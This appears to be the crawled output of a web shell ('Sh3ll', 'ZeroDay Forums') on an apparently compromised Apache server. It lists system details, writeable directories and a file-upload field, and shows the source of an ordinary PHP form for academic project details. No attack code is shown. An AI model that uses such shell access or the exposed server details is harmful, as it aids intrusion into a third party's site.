Sh3ll
OdayForums


Server : Apache
System : Linux profile 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 8.0.28
Disable Function : NONE
Directory :  /var/www/html/venkat/repo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/venkat/repo/project.php
<?php
	include ("hmain.php");
?>	<center>    <b> <u> Please fill the Project Details </b> </u>  <br> <br></center>
	<form method ="post" action = "submit.php">
	<table width = "80%">
		<tr>
			<td width = "30%"> Name of the Principal Investigator <br> <br> </td>
			<td width = "10%"> : <br> <br> </td>
			<td width = "60%"> <input type = "text" name = "investi">
			<br> <br></td> 
		</tr>
		<tr>
			<td width = "30%"> Name(s) of the Co-Investigator <br> <br></td>
			<td width = "10%"> : <br> <br></td>
			<td width = "60%"> <textarea rows = "2" name = "coinvest" cols = "50" ></textarea>
			<br> names separated by comma <br> <br> </td>
		</tr>
		<tr>
			<td width = "30%"> Sponsoring Agency <br> <br></td>
			<td width = "10%"> : <br> <br></td>
			<td width = "60%"> <textarea rows = "2" name = "agency"  cols = "50"></textarea>
			<br> <br> </td>
		</tr>
		<tr>
			<td width = "30%"> Title of the Project <br> <br></td>
			<td width = "10%"> : <br> <br></td>
			<td width = "60%"> <textarea rows = "2" name = "title" cols = "50" ></textarea>
			<br> <br> </td>
		</tr>
		<tr>
			<td width = "30%"> Status of the project <br> <br> </td>
			<td width = "10%"> : <br> <br> </td>
			<td width = "60%"> 
			<select name = "status">
  					<option value="pub">Completed</option>
  					<option value="guest">Ongoing</option>
  			</select> 
			<br> <br> </td>
		</tr>

		<tr>
			<td width = "30%"> Year of the award<br> <br> </td>
			<td width = "10%"> : <br> <br></td>
			<td width = "60%"> <input type= "number" min="1980" max="2018" value="2016" name = "year">
			<br> <br> </td>
		</tr>

		<tr>
			<td width = "30%"> Total cost of the Project (in lakhs)<br> <br> </td>
			<td width = "10%"> : <br> <br></td>
			<td width = "60%"> <input type = "text" name = "cost">
			<br> <br> </td>
		</tr>
		
		<tr>
			<td width = "30%">  <input type = "hidden" name = "decision" value = "project">  </td>
			<td width = "10%">  </td>
			<td width = "60%" > <br> <br><input type = "submit" value = "Submit"> 
			
		</tr>



	</table>
	</form>

ZeroDay Forums Mini